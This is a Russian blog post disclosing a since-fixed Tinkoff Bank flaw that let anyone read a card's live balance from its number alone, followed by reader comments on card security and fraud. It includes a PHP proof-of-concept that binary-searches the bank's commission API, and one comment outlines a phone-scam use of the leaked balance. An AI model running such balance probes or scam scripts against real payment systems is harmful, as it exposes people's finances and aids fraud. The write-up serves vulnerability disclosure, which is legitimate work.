Началось все с того, что в один прекрасный вечер попросил меня друг закинуть ему денег на карточку. Всегда решал такие проблемы либо через интернет-банк, либо через мобильное приложение, но поскольку с недавних пор у них интернет-банк превратился в дикого монстра, на этот раз решил воспользоваться их сервисом card2card.
Заполняю себе спокойно поля, и тут случается неожиданное:
Подождите, ведь я же не нажал кнопку отправить! Откуда это взялось? Поигрался с суммой, проверяется реальная сумма на карте.
Сначала я грешным делом подумал, что аякс отправляет на сервер все данные карты, включая CVC и срок действия, при каждом редактировании. Это, конечно, свинство, но https — пусть творят что хотят. Захожу в запросы браузера:
CVC не передается, это уже интересно. Зато передается срок действия, хоть какая-то защита, думаю я, хотя все еще в недоумении зачем проверять баланс карты аяксом на лету.
Но все же интерес докопать до конца не покидает и редактирую запрос:
Упс. На обратном конце не проверяется ничего, кроме номера карты отправителя.
Очевидно, что методом простого перебора легко подобрать сумму, ниже которой все ок, а выше уже ошибка — это и будет баланс карты. То есть, зная один лишь номер карты (который конечно информация не слишком публичная, но и не критичная, многие дают номера карт друзьям и даже выкладывают их в интернет для получения платежей) можно узнать, сколько там денег. Причем, как показали эксперименты, никакие месячные лимиты на это не влияют.
Дырка не критичная, но доступность этой информации в реальном времени позволяет отслеживать все расходы/пополнения — а это уже серьезнее.
Сразу же отписался безопасникам по публично доступной почте, но реакции, как обычно, ноль.
Быстренько набросал proof of concept (сильно не бейте, мой опыт программирования — бейсик в школе).
<?php
header( 'Content-type: text/html; charset=utf-8' );
$card = $_GET['card'];
$card = preg_replace('/[^0-9]+/', '', $card);
if (strlen($card) != 16) {
exit('<br>Wrong card number: ' . $card);
}
echo 'Probing card ' . $card . '... <br>';
flush();
ob_flush();
sleep(1);
$money = 50000;
$max = 1000000;
$min = 0;
$done = false;
$iter = 0;
while ($done == false) {
if($iter %5 == 0) {
echo 'Still working, please hang on...<br>';
flush();
ob_flush();
sleep(1);
}
$json = file_get_contents('https://www.tinkoff.ru/api/v1/payment_commission/?paymentType=Transfer¤cy=RUB&moneyAmount=' . $money . '&provider=c2c-anytoany&sessionid=1&origin=prt&cardNumber=' . $card . '&fieldtoCardNumber=1&fieldagreement=&securityCode=cvc&expiryDate=10/20');
$obj = json_decode($json);
$result = $obj->{'resultCode'};
if ($result == "OK") {
//need to increase
$min = $money;
$money = ($min + $max) /2;
$last_total_money = round($obj->payload->total->value);
} else {
//need to decrease
$max = $money;
$money = ($min + $max) /2;
}
$iter++;
if ((floor($max) - floor($min)) == 0) {
$done = true;
echo '<br><br>Money amount is ' . $last_total_money . ' roubles.';
}
if ($iter > 50) {
exit('<br><br>Something went terribly wrong, or the bug is already fixed. Last amount is ' . $last_total_money);
}
}
?>
Ну и на правах побрюзжать. Последний интернет-банк получился абсолютно неюзабельным, грустно читать тут статьи разработчиков, которые им еще и гордятся. Переборщили так, что даже заходить лишний раз не хочется, грузится подольше некоторых игрушек, хорошо, хоть мобильное приложение пока нормальное.
Хэппи энд
Уязвимость закрыли в течение нескольких часов после публикации, буквально на следующий день Тинькофф банк объявил о программе баг баунти, а со мной связались представители банка и предложили неплохое (особенно с учетом публично разглашенной уязвимости) вознаграждение. Еще через шесть дней деньги упали на карту.
Такой реакции от банка я ожидал в последнюю очередь, и если честно с трудом представляю что-нибудь подобное от других крупных игроков. Если бы не этот нелепый инцидент с письмом, все было бы совсем хорошо.
Тинькофф, вы молодцы, ребята, продолжайте в том же духе.
Комментарии (422)
LazyGatto
11.08.2016 21:31+32На самом деле это ж для мошенников раздолье. «Мы вам звоним из техподдержки банка, на вашем счету сейчас N руб. Но для *придумать действия* нам еще нужны дата действия карты и код с обратной стороны». Мда, Тинькофф Банк, печаль…
DenimTornado
11.08.2016 23:00блин, неужели кто-то вот так готов рассказать данные?(
EvgeniyKirov
12.08.2016 00:44+11Многие и не знают, что цифры на карте это как бы секрет. И что вообще ей можно в интернете расплатиться как-то. И что такое интернет вообще.
muon
12.08.2016 03:00+24Когда знакомился с картами, долго не мог поверить, что это «цифры на карте это как бы секрет». Их же кассирша видит, и сосед по очереди при желании может разглядеть, а запомнить три цифры — Штирлицем не надо быть. Видимо, схема придумывалась, когда информационную безопасность ещё не придумали.
NINeOneone
12.08.2016 09:18+5К чести Тинькофф банка могу сказать, что они бесплатно дают вторую карту. На первой ставим запрет на интернет покупки. На второй запрет на офлайн покупки и вуаяля — светишь первую карту без опаски.
vlreshet
12.08.2016 09:42Две карты — как-то костыльно выглядит. В моём банке (зелёный такой, украинский) по умолчанию на всех картах стоит запрет на интернет операции, а если его выключить — можно установить лимит на снятие. Пока запрет включён — хоть на столбе напиши свои cvv и срок действия, но снять деньги не получится.
Urvin
12.08.2016 10:06+1В Тинькове также есть выключатель интернет-покупок и лимит по картам.
Просто лениво лазить и переключать настройки при необходимости купить что-либо в этих ваших интернетах. Вот и две карты.Optik
12.08.2016 10:39Насколько знаю, можно и виртуальную завести.
wuoten
12.08.2016 15:06Недавно так и хотел сделать, виртуальную карту для инет покупок, но оказалось, что без комиссии можно оплатить только тех, кто есть в их интернет-банке (тот же айтюнс уже не прокатит). И вот как бы вопрос, почему можно вторую карту выпустить и бесплатно ей оплачивать, а выпустить такую же карту, но без перевода пластика нельзя.
И да, новый интернет-банк просто адский. В этом месеце даже начал платить в сбербанк онлайне.
Demir0
12.08.2016 20:36-1странно, в том же привате (зеленом украинском) виртуальные карты абсолютно идентичны пластику. разве что срок годности сильно больше. делаешь их сколько угодно. а если нужно расплачиваться в супермаркете, то делаешь себе пластик за 15 минут в любом отделении в неограниченных количествах и бесплатно. я как-то раз зашел закинуть деньги и случайно вышел с тремя новыми картами в разной валюте)
NINeOneone
12.08.2016 10:50Запрет и лимиты тоже есть, но это ж включать надо каждый раз.
Две карты в том числе очень хорошо выглядит, когда карта теряется. Всегда под рукой запасная. Не приходится ждать две недели пока восстановят.
Temirkhan
12.08.2016 10:42А разве оплата происходит не после ввода смс-кода подтверждения, который присылается на номер, привязанный к карте? Не совсем понял, что компрометируется?
shanker
12.08.2016 10:49Уже несколько лет, как для покупки авиа билета Аэрофлота через интернет не требуется никакого подтверждения через код SMS. Просто номер карты и CVC и… Приходит SMS. Радостно ожидаешь, что код подтверждения операции. А это — инфо о снятии денег. Вот какой-нибудь кассир супермаркета быстенько незаметно сфоткает карту с 2-х сторон и отправится за ваш счёт на Мальдивы.
Так с картой сбербанка. Интересно: у Сбера требовать объяснений ситуации или у каого ещё?Temirkhan
12.08.2016 10:55Я весной летал аэрофлотом. Оплачивал «шикаааааарным» сбербанком и даже там приходило смс с кодом подтверждением оплаты. Это уже позднее банк прокатил меня(во всех смыслах) с велосервисом, который тупо списал у меня со счета нужную им сумму. Так что, полагаю, в обход подтверждений можно оплачивать только продавцам с определенными привилегиями у того или иного банка.
AMIluvatar
12.08.2016 11:39Наличие или отсутствие кода подтверждения 3DS в данной ситуации зависит только от сайта, где совершается покупка. У банка пивовара 3DS подключена ко всем картам по умолчанию, так что и по Тиньковской карте пришла бы смс. 3DS (если он есть на сайте и банк эмитент карты его поддерживает) не обойти.
soniq
12.08.2016 20:23Сайт может поддерживать 3DS, чтобы уменьшить потери от фрода. Думаю, для аэрофлота это не критично — у них не только есть все данные пассажира, а скорее всего, даже сам пассажир лично к ним придет.
kristoferrobin
13.08.2016 22:13+1не сайт, а мерчант. сайты сами по себе ничего не решают, списание денег по карте идет не в 1 запрос жеж, там есть этап проверки карты и вот на нем есть флаг есть ли 3д на карте. если есть, то как ни крути, а придется делать проверку кода иначе отобьет операци. а вот мерчант, который выдается этим сайтам(типа id) бывает с игнорированием 3д, т.е. они могут забить на 3д, хотя по факту вернет ответ что на карте он есть. это касается только покупок в интернете, если делать перевод с карты на карту там без вариантов. у алиэкспресса, например, такой. это легаси в протоколе визы/мастера с тех пор, как разрешили отелям лочить сумму без любых проверок на карте для предзаказов, так опция для мерчантов игнорировать 3дсекьюр и появилась
soniq
14.08.2016 21:08Простите, а кто такой «мерчант»? Разве это не Аэрофлот, (или те чуваки, которые ему писали сайт, или те третьи чуваки, которые им продали либы для работы с пластиком — за этих всех все равно же отвечать аэрофлоту)?
kristoferrobin
17.08.2016 09:03мерчант в терминах визы-мастера это просто уникальный идентификатор по которому они опеределяют кто списывает деньги, его по договору нельзя передавать, потому да — отвечает тот кому выдали этот мерчант
ploop
12.08.2016 10:57Интересно: у Сбера требовать объяснений ситуации или у каого ещё?
Да. Вроде банки обязали сначала возвращать деньги, потом проводить расследование.
Покупка билета маловероятное событие, найти вора элементарно, а вот заказ в иностранном интернет-магазине (алиекспресс уже привели как пример) считай гиблое дело.Temirkhan
12.08.2016 11:00Могу заверить Вас всеми восемью руками, что сбербанк об этом законе ничего не знает
ploop
12.08.2016 11:09Может это и не закон, а рекомендация, не вдавался в подробности. Если закон — можно надавить.
Temirkhan
12.08.2016 11:17У меня с дебетовой карты списали без подтверждения сумму, которой у меня на карте не было. Затем «провели расследование» и заявили, что я подтвердил оплату. На попытку предоставить детализацию операций по сим карте с доказательством того, что это откровенно ложь, мне коротко отрезали «обращайтесь в прокуратуру».
Сказать, что я был шокирован — не сказать ничего. Казалось бы, что может быть более бредовым? Я скажу — позвонить мне из сбербанка и сказать, что у меня на дебетовой карте долг и надо бы его погасить.ploop
12.08.2016 11:22Надо погуглить на эту тему. На сколько слышал, банк идёт на встречу только при наличии заявления в органы.
Ну и к слову: с дебетовой карты сумму, которой нет, списать нельзя, это аксиома. Просто дебетовые карты у нас в стране практически не используются, а используются овердрафтные. Там такая возможность есть, но пользователь (или злоумышленник) опять же не сможет воспользоваться суммой ниже баланса. Это может сделать только сам банк, например, списав плату за обслуживание (или другие услуги) при отсутствии средств. У сбера, кстати, овердрафтные карты платные, плата списывается раз в год и составляет от 400 до… дофига рублей в зависимости от типа карты.soniq
12.08.2016 20:28Вы не путайте карты с овердрафтом (странный микс кредитки с дебетовой), и технический овердрафт, который действительно может возникнуть даже в процессе обычного использования «до последней копейки». Просто наши банки любят брать комиссию за обслуживание под видом технического овердрафта.
ColorPrint
12.08.2016 23:30+2Ну и к слову: с дебетовой карты сумму, которой нет, списать нельзя, это аксиома.
Не правда. Технический овердрафт при курсовой разнице, оффлайн-операции без авторизации и куча других вариантов.ploop
15.08.2016 08:26Так и есть, но это не дебетовые карты, а овердрафтные. Потому их и используют. Это удобнее всем, и банкам, и клиентам.
ColorPrint
15.08.2016 10:48Нет такого понятие в МПС. Есть кредитные и есть дебетовые, всё.
ploop
15.08.2016 12:50Ну тут даже вики говорит, что по дебетовым картам невозможно кредитование деньгами банка. Однако в ряде случаев возможен несанкционированный (технический) овердрафт. То есть по сути это одно и тоже, зависит от условий банка.
alexpelikh
13.08.2016 22:14+1Еще как сможет
При оффлайн авторизации (как раз, которая возможна на всех типах эмбоссированных карт) чем угодно — от необходимым образом настроенного злоумышленниками терминала, до импринтера, или копии карты — вас могут загнать в очень неплохой долг. Именно, в том числе, по этой причине сейчас банки спокойно отказывают в выдаче даже дебетовых карт без объяснения причин, а данных с вас собирают как на кредитную. С точки зрения рисков — любая карта — это риск для банка. Как пример — чудесная страна Англия. 75% АЗС по выходным там не используют онлайн авторизацию, и о своих расходах на бензин вы узнаете только в понедельник. И деньги с вас спишут, даже если на карте их нет.
strangewalker
12.08.2016 13:15Это правила Визы и Мастеркарда.
В подобных случаях, вместе с завялением в банк, надо писать жалобу напрямую визе\мастеру. Они выдадут банку «стимул» соблюдать правила.a1ien_n3t
12.08.2016 21:36+2А вот не совсем так. У вас не получится просто так написать в ПС. Очень правильно написанно вот в этом комментарии
https://habrahabr.ru/post/302836/#comment_9647276
memtew
12.08.2016 10:10Так их можно
записать на бумажкузапомнить и стереть с карты лезвием.
Daimos
12.08.2016 10:23В магазине могут не принять такую карту, а то и вообще забрать, если не будет паспорта с собой.
Free_ze
12.08.2016 10:58Заклеить чем-нибудь (да хоть куском синей изоленты) и не выпускать карту из виду никогда. Любая компроментация будет явной, а способ сокрытия CVV — обратимым.
ploop
12.08.2016 11:11Лучше закрасить, например, маркером с краской (такой, с шариком внутри). И стойко, и не отклеится в тракте банкомата, заклинив карту, и смыть можно при желании.
Daimos
12.08.2016 11:18Как это не выпускать никогда? Массово терминалы далеко то покупателя стоят, и в ту зону вас банально не пустят. А ездить бог знает куда в другой гипер — не всегда возможно.
AMIluvatar
12.08.2016 11:42+1За последние пару лет 90% магазинов, где я бываю (Пятерочка, Магнит, Ашан, Лента, Окей, Перекресток, Карусель + куча непродуктовых типа Икеи) оснастили терминалами с поддержкой PayPass/PayWave, теперь я карту из рук вообще почти не выпускаю.
mgremlin
12.08.2016 18:37Это только на мелкие суммы же… до 1000 рублей, насколько помню. Или как-то по-другому работает? Ни разу еще не пользовался, хотя карт с пейпассом навалом.
yoshitoshi
15.08.2016 20:34+1Аэроэкспресс уже давно активно пропагандирует такой метод оплаты, ещё и 10% скидку на билет дают.
Так вот, на «заре» внедрения PayPass, когда ещё не все знали, что так можно, но уже можно было оплатить билет PayPass'ом, удалось повторить старый прикол про первые бесконтактные билеты на метро.
Положили карточку в загранпаспорт, подошли к билетному автомату и со словами «у меня годовая Британская виза! Именем Королевы!» приложили паспорт. Все удивились, когда из автомата вылез билет. Сейчас, конечно, эти уже никого не удивишь…
К чему я? Безусловно, используйте PayPass везде, где он есть, иногда это очень экономит время. Просто, раньше это было не только удобно, но и весело. А сейчас — просто удобно :-)
Free_ze
12.08.2016 19:17Петербург, наши дни. Такие ситуации случались только в кафе/ресторанах и самое плохое, что могло произойти — приходилось идти к стойке и смотреть вживую. Но в 95% случаев проблем нет, используются мобильные терминалы.
AMIluvatar
12.08.2016 11:41+1У меня так на кредитной карте сделано, стерт код полностью. За полтора года ни в одном магазине никто даже виду не подал. Если кассир начнет возмущаться, можно справедливо возразить, мол «а пошто вам барышня нужен мой код для оплаты в интернете?».
yoshitoshi
12.08.2016 13:52Срезал лезвием этот код на нескольких картах. Никаких проблем никогда не было. Учитывая, что все большее распространение получает PayPass, покупатель даже карту из рук не выпускает.
Хотя, некоторые кассиры этому недовольны. Один раз кассир даже отказалась проводить покупку, ссылаясь на то, что мы ей должны карту дать в руки, что ей что-то проверить :-)Daimos
12.08.2016 15:56У нас часто карту смотрят еще и с двух сторон. Пару раз попадал на ситуацию, когда отказывались принимать карту у людей, у которых на полосе для подписи проступала надпись void.
Ну и сами подтверждаете, что была проблема :)
У меня еще интересный случай был — пытался расплатиться в мелком магазине в Испании картой MasterCard мгновенного выпуска, на которой нет моих Имени и Фамилии, девушка попросила доки — дай ей водительское удостоверение РБ нового образца — она посмотрела его и сказала ОК :) Что она там могла сравнить — непонятно :)yoshitoshi
15.08.2016 11:47+1В моем случае проблема была с головой у девушки, она отказалась проводить оплату и демонстративно отвернулась.
Осмотр карты с двух сторон — старый и распространенный прием сбора карточных данных. Над кассой висит камера, кассир пару раз переворачивает карту, так, чтобы на камере было хорошо видно обе стороны. Пока банки не перешли на 3DSecure (далеко не все банки перешли на него), этой информации было достаточно, чтобы купить что-то в интернете.
mrsantak
15.08.2016 11:34А разве кассир не должен сравнивать подпись на чеке и подпись на карте?
yoshitoshi
15.08.2016 11:36Если вводить pin-код или использовать PayPass/PayWave (что для сумм выше 1000? так же требует ввода pin-кода), подпись на чеке не требуется. Соответственно, и сравнивать нечего.
norlin
15.08.2016 11:43так же требует ввода pin-кода
Зависит от банка/от настроек. Мне удобнее без пина, по подписи, независимо от суммы.
yoshitoshi
15.08.2016 11:56Подписью обычно используется при прокатывании карты магнитной полосой.
Все современные терминалы и адекватные банки запрещают использование магнитной полосы, если терминал оборудован карт-ридером. В таких случаях, после прокатывания, терминал просит подумать еще раз и предлагает использовать чип. А это требует ввода пин-кода.
Да, иногда банки дают возможность изменить приоритет «подпись-чип». Но, ваш банк может и разрешить, а банк, обслуживающий конкретный терминал, может считать по-другому, и его мнение будет приоритетным.
А Вы, используя подпись вместо чипа, сильно повышаете риск кражи денег с карты. Считыватели магнитной полосы сейчас делают настолько миниатюрными, что Вы можете и не заметить, как кассир снимет копию карты…norlin
15.08.2016 12:05Ну я ни разу не видел, чтоб прокатывали магнитную полосу. Имел в виду именно чип/PayPass.
Насчёт обслуживающего банка – на данный момент очень редко встречаются ситуации, когда терминал таки просит пин. Только в макдональдовских терминалах встречаю (ну и в банкоматах, само собой).
Насчёт риска – насколько я понимаю, всё немного наоборот: при краже пина я никак не смогу оспорить транзакцию. А вот транзакции по подписи могут быть легко оспорены.
mrsantak
15.08.2016 12:19Оспорить-то можно, вопрос в том, удовлетворят ли.
Вот сперли у вас карточку, купили что-то и расписались левой подписью. Вы транзакцию оспариваете. По идее нужно проводить анализ подписи. А он, по слухам, очень часто выдает что-то в стиле «подлинность подписи определить нельзя».
Или я не прав и оспаривание в такой ситуации происходит по какой-то другой процедуре?norlin
15.08.2016 12:21Без понятия, ни разу пока не попадал на какие-либо кражи денег с карточек (хотя пользуюсь ежедневно, как оффлайн, так и онлайн).
Ну, в любом случае, это даёт шанс на оспаривание, в отличие от потери пин-кода – там, насколько я знаю, держатель карты "сам себе злобный буратино".
yoshitoshi
15.08.2016 12:28Был случай: спустя полгода после поездки в Тайланд у меня с кредитки сняли весь остаток. При чем, как я выяснил в службе поддержки банка, было совершено 5 попыток снятия наличных, и только на пятый раз угадали остаток (около 3000?).
Обращение в банк + копия загранпаспорта + 2 недели ожидания — и деньги вернули. Конечно, сумма не такая большая, они могли больше ничего не проверять. А в других случаях банк может запрашивать дополнительные данные, например, записи с камеры банкомата/магазина, где провели левую операцию.mrsantak
15.08.2016 12:37А транзакция была подтверждена pin'ом?
Слухи о невозможности опротестовать транзакцию подтвержденную pin'ом слышу очень часто. А не засветить pin в наших магазинах — это практически нереальная задача.
illusio
15.08.2016 12:53На моих картах по дефолту запрещены все транзакции с иностранных государств. Перед поездкой звоню оператору и прошу включить «Особый режим» для нужных карт, сроки ставлю равные срокам пребывания в стране, если надо будет дольше — можно ещё раз позвонить.
Довольно эффективно при зарубежных поездках. Иногда приходится включать отдельную страну на один день, как пример, при платежах в Steam и подобных системах.
yoshitoshi
15.08.2016 12:23Одного пин-кода мало, нужно еще и чип скопировать (либо, украсть карту).
А это сделать намного сложнее, чем скопировать магнитную полосу.
Оспорить операцию можно, если докажете, что ее проводили не Вы и оригинальная карта в это время находилась тоже у Вас. Например, кто-то снял наличные в банкомате Тайланда. Вы в это время были в Москве (подтверждается загранпаспортом и другими способами) и тоже пользовались своей картой. Хотя, по идее, такие операции должны попадать под дополнительный контроль СБ — как банка, так и платежной системы.
xapienz
16.08.2016 09:23после прокатывания, терминал просит подумать еще раз и предлагает использовать чип. А это требует ввода пин-кода
А вот и нет :) У меня карточка корейского банка, и пин-код требуется только при оплате на территории Кореи.
При оплате в других странах авторизация всегда идёт через чип, но пин-код никогда не запрашивается.
Скорее всего, это защита от иностранных кардеров, чтобы не было возможности увести пин, потому что этот же самый пин-код (да, пин-код кредитки) используется для подтверждения онлайн-транзакций.
vlivyur
15.08.2016 16:43А на карте написано что без подписи недействительна.
yoshitoshi
15.08.2016 17:02+1Это абсолютно никак не связанные друг с другом факты:
1. Карта без подписи не действительна — на карте обязательно должна быть подпись клиента.
2. При оплате с вводом пин-кода клиент не выпускает карту из рук — и, правда, зачем?
3. При оплате с вводом пин-кода кассир не проверяет соответствие подписи, так как сама подпись не ставится.Daimos
15.08.2016 18:26Часто терминалы далеко от клиента ( у нас в РБ) и кассир в любом случае берет карту в руки и может посмотреть подпись. Плюс у кассира есть инструкция, что он может потребовать документ, удостоверяющий личность, если у него возникли сомнения во владельце карты.
yoshitoshi
15.08.2016 19:57Магазины могут придумывать любые внутренние правила, но они не будут иметь никакой силы, они ведь «внутренние». Значение имеют только правила банков и правила платежной системы, при чем, вторые — в приоритете.
Да, у вас имеют право требовать паспорт даже при оплате магнитной полосой. А платежные системы дают вам право отказать в этом.
Вот цитата из правил Сбера, где видео, что вместо паспорта можно использовать пин-код:
Кассир торгово-сервисного предприятия может потребовать предъявления документа, удостоверяющего Вашу личность. В случае отсутствия документа Вам может быть отказано в проведении операции по карте.
В случае если операция проводится с использованием электронного терминала, кассир может предложить Вам самостоятельно вставить карту в терминал и ввести ПИН-код на выноснои? клавиатуре электронного терминала. При отказе ввести ПИН-код или неверном вводе ПИН-кода в операции может быть отказано. Несогласие подписать чек (слип) электронного терминала также может привести к отказу в проведении операции."mrsantak
15.08.2016 20:30Магазины могут придумывать любые внутренние правила, но они не будут иметь никакой силы, они ведь «внутренние». Значение имеют только правила банков и правила платежной системы, при чем, вторые — в приоритете.
Ну не совсем так. Торговая точка подчиняется соглашению с банком. Банк подчиняется соглашению с платежной системой. В идеальном мире, это бы означало то что вы написали. В реальном мире же, платежная система может долго бодаться с банком, а в это время торговые точки продолжают подчиняться соглашению с банком (и за нарушение этого соглашения торговой точке может и прилететь). Понятно, что в финале все сойдется к идеальному миру, но этот процесс может длиться годами и оборваться закрытием банка.
Ну и справедливости ради, торговая точка имеет право вводить свои правила (пока они не противоречат закону, который, в данном случае, строг, но некоторые вольности все же позволяет).yoshitoshi
15.08.2016 20:53Ключевой момент — «в идеальном мире» — да, согласен. А по факту, торговые точки в лице кассира, часто по его же инициативе, придумывает новые правила, которые не только нигде не прописаны, но и идут в разрез с правилами банка или платежной системы. Например, любят требовать подпись на слипе при вводе пин-кода, ссылаясь на внутренние приказы.
Допустим, торговая точка действительно ввела такое правило. Ок. Законом это не запрещено? Да, вроде бы, не запрещено. Но, такое правило не имеет ничего общего с реальностью, так как в правилах почти всех банков указано «либо подпись, либо пин-код».mrsantak
15.08.2016 21:21Но, такое правило не имеет ничего общего с реальностью, так как в правилах почти всех банков указано «либо подпись, либо пин-код».
Зависит от формулировок. Или не всегда исключающее :)
А по факту — да, это чаще всего самоуправсто на местах от небольшого ума. При этом вряд ли это даже инициатива кассира. Скорее какой-нибудь эффективный менеджер составил инструкцию на основе дикой помеси правил и слухов. Я вот как-то в одном магазине видел иконочку наклеенную на терминал. Очень надеюсь, что это был троллинг…
Daimos
16.08.2016 10:11У людей нет столько времени спорить с кассиром.
Почему вы решили, что правила платежной системы в приоритете? В РБ в приоритете только правила НацБанка.
4.2. При совершении операции с использованием платежного терминала (POS-тер-
минала) кассир может потребовать у вас ввести ПИН-код или подписать карт-чек в соот-
ветствии с требованиями, установленными правилами платежных систем, а также предо-
ставить паспорт в целях установления личности держателя карточки.Daimos
16.08.2016 10:22http://www.visa.com.ru/common/pdf/Visa_Payment_System_Operating_Regulations_Russia.pdf
Нет вообще упоминаний про паспорт или документ удостоверяющий личность, однако даже в Испании меня просили показать доки, что карточка моя.
lamoss
16.08.2016 13:29А у меня в паре мест (экзист и клиника будь здоров) сверяют ФИО на карте и ФИО в документе, а если разные — отказываются принимать
Disasm
12.08.2016 10:39+1Если у кого-то есть карта Тинькофф и он не знает про интернет — это, как минимум, странно.
Daar
12.08.2016 10:12+1У меня недавно был случай, мать знакомой хотела мебель на Авито купить, нашла какой-то диван и типа дешево, позвонила. Ей говорят что много желающих, типа если внесете предоплату то ваш. Она и согласилась, ну и говорят что можно быстро, по карте… И её попросили продиктовать все цифры спереди и сзади карты… ну и потом все деньги с её карты пропали. Она тоже типа «Ну мне в банке сказали что ПИН код никому не говорить, это секрет»…
DenimTornado
12.08.2016 10:17Это хорошо ещё, что уже повсеместно двухфакторную авторизацию ввели…
Borz
12.08.2016 10:20ну вот есть такая авторизация у одного зелёного, а один оранжевый интернет-провайдер у нас в городе снимает деньги с карты "по старинке" и по сей день
Daar
12.08.2016 10:27+1Не у всех банков все идет по умолчанию, у некоторых надо эти сервисы подключать и даже за них платить. Скажи какой-то пенсионерке «Двух-факторная идентификация владельца карты», она крестится начнет :)
Или, у меня есть карта ВТБ24, так у них за смену пина берут деньги… в общем пытаются зарабатывать на моей безопасности.
illusio
12.08.2016 11:00+1В штатах это нормальная практика — хочешь закрыть договор связи, заказать что-то по телефону, чтоб привезли из другого штата и любой другой ситуации. Чтобы не приезжать в офис диктуешь номер карты и код по телефону. Я был в шоке, когда первый раз увидел такой метод оплаты.
catharsis
12.08.2016 12:43+2Компенсируется zero liability кредитных компаний.
То есть если пользователь пожаловался, ему сначала возвращают деньги, потом заводят дело о мошенничестве (на кого посчитают нужным).
ChALkeRx
12.08.2016 12:47Или не заводят, в зависимости от суммы ущерба.
Flammar
12.08.2016 14:28Насколько я знаю, само деяние в виде использования электросвязи или государственной почти для совершения преступления по американским законам есть отдельное преступление, расцениваемое на уровне лжи под присягой и караемое на уровне пресловутой 58-й статьи УК РСФСР 1922-1960 годов. Равно как и подача заведомо проигрышного иска и использование поддельных документов в суде. Там попытки использовать государственную правовую машину, почту или телеком с преступных целях рассматриваются сами по себе как государственные преступления…
Rampages
12.08.2016 11:01+4Amazon'у даже CVC не нужен :)
Demir0
12.08.2016 20:48+1у меня был случай, когда в отеле просто не было такого функционала — ввода cvv2 кода. только номер и дата. банк же упорно реджектил все. я даже нашел в настройках где можно отключить проверку cvv2, но не получилось и пришлось просить карту знакомого британца. у него все прошло без вопросов.
a1ien_n3t
12.08.2016 21:40+1Тогда кстати вашу карточку неполучится привязать к paypal так-как paypal тоже совершает все операции без cvv2. Только первичная валидация требует cvv2
schroeder
11.08.2016 21:32+17подождите ка минуточку, это тот банк, который написал интересную клаузу всем френдам одного товарища в контактике, который что то там по кредиту просрочил? Он, да? И вы у него счет держите? Серьезно?
user343
11.08.2016 21:44+1Ну его карты mastercard gold ещё и к яндекс-кошельку дешево привязывались для покупок в магазинах (150-200 р. за 3 года обслуживания и 0% комиссий при оплате картой). Потом правда система Я-Д сама эмиссией карт занялась.
schroeder
11.08.2016 21:56+1Все таки жители РФ странные люди: их банк сознательно нарушает кучу законов, распространяет кучу строго конфеденциальной информации, плюет в лицо своим клиентам, а они по прежнему им ппользуются да еще и жалуются на какие то там дыры в безопасности. Что этот банк должен сделать ещё, что бы вы наконец осознали, что вы люди с правами, а не тварь дрожащяя?
pansa
11.08.2016 22:19+14Ваше мнение, безусловно. Но вы можете также ознакомиться с мнением других клиентов различных банков. Есть достаточно популярный ресурс банки-ру. Сравните. Я год назад сравнил и очень доволен.
icoz
12.08.2016 07:58+1Значит, Вам повезло, и в отношении лично Вас этот банк не нарушал законов. А мне досталось, хотя я даже не клиент, и никогда им не был. Просто им очень хотелось, чтобы я им стал.
yoshitoshi
12.08.2016 10:00-7«Я эту книгу не читал, но считаю, что она — полное дерьмо»…
yoshitoshi
12.08.2016 13:55-3Не понимаю, почему аналогичное по смыслу высказывание пользователя выше «никогда не был их клиентом, но банк плохой» ни у кого не вызвало такую же бурю негодования? :-)
icoz
12.08.2016 14:28+3Наверное потому, что я чётко сказал, что их клиентом не был, но они в отношении меня нарушали федеральные законы? Может быть, я не совсем чётко поведал, что мне пришлось тратить время и силы на борьбу с ними.
Так что книгу читал, но не по своей воле.
areht
11.08.2016 22:41+15Тем или иным способом «плюет в лицо своим клиентам» примерно любой банк в РФ.
Naps
11.08.2016 22:50-2Ну не любой, а вот тинькофф успел неплохо себе репутацию испортить.
areht
12.08.2016 00:04+7Так вы сразу список выкладывайте, за кого поручитесь?
Newbilius
12.08.2016 07:34+1Поручусь — ни за кого. Но тот же Рокетбанк пока что пушистый, например срочно сообщил, когда их банк-партнёр должен был через день закрыться, что бы все успели вывести деньги. Баги в мобильном приложении порой закрывают в течении часа после обращения. Известных мне гадостей пока сделать или опубликовать не успели.
Был минус — снижение ставок по картам с определённого срока сообщили без пуш-уведомления, просто внутри приложения, это было для меня не критично, но неприятно — так что они тоже не идеал. Но в плане известных мне банков у них пока что карма наиболее чистая. Возможно не в последнюю очередь потому, что кредитов они не раздают.Optik
12.08.2016 08:08+2Но тот же Рокетбанк пока что пушистый, например срочно сообщил, когда их банк-партнёр должен был через день закрыться, что бы все успели вывести деньги.
кому-то сообщили, кому-то нет. Примерно половина моей выборки долбалась с их поддержкой.Newbilius
12.08.2016 13:24Сообщили массовой рассылкой по электронной почте, все известные мне знакомые получили. Согласен, электронная почта не 100% гарантирует доставку, спам-папки, всё-такое, но тем не менее. К тому же, они вообще не обязаны были предупреждать.
areht
12.08.2016 08:151) Нет такого. Есть Ханты?Мансийский банк Открытие. Их делить не более продуктивно, чем должников ТКС от вкладчиков ТКС.
2) По мне, так отсутствие ИБ — это вполне плевок на клиентов само по себе.
3) Ну и он же реально глючный и нефункциональный. Я его с 4-х карт других банков пополнить так и не смог. Переводы уходят как успешные, потом молча возвращаются (и это не баг — это фича).
artemgapchenko
12.08.2016 08:28+3Это у вас какое-то масштабное невезение. Я и с Альфы и со Сбера пополнял — всё нормально проходило.
areht
12.08.2016 08:46Ну, если бы только пополнение не работало — я бы списал на невезение. Но когда переводы молча откатываются — это люди даже не пытались.
yoshitoshi
12.08.2016 10:03+4Рокетбанк — это не банк, а сервис. Не путайте горячее с мягким.
И мне интересно, что это они «могут закрыть баги в мобильном приложении в течение часа», если, например, публикация обновления в AppStore занимает минимум 2-4 дня. Если они, конечно, не используют WebView…
ValdikSS
12.08.2016 10:43-1Можно патчить приложение на лету.
ChALkeRx
12.08.2016 10:58+1В AppStore — нельзя. Опять же, если они не используют WebView.
ValdikSS
12.08.2016 11:01-2AppStore тут ни при чем, разработчик может подгружать код с сервера.
ChALkeRx
12.08.2016 11:30+3Не может, это прямо запрещено в соглашении AppStore, в любых проявлениях, кроме отображения контента в стандартном WebView.
rauch
13.08.2016 09:52+1Много логики реализовано на самом клиенте ИБ?
Думаю минимум в 80% случаев баги на сервер-сайд, и никаких перевыкатов «в AppStore» делать не нужно
yoshitoshi
12.08.2016 13:57Как бы, давно эту лавочку прикрыли. Наверно, как раз после той истории с приложением, которое пропустили как «фоточки котиков» (условно), а потом автор удаленно заменил чуть кода.
Вот он сурсы грузить — пожалуйста, многие это используют.
Newbilius
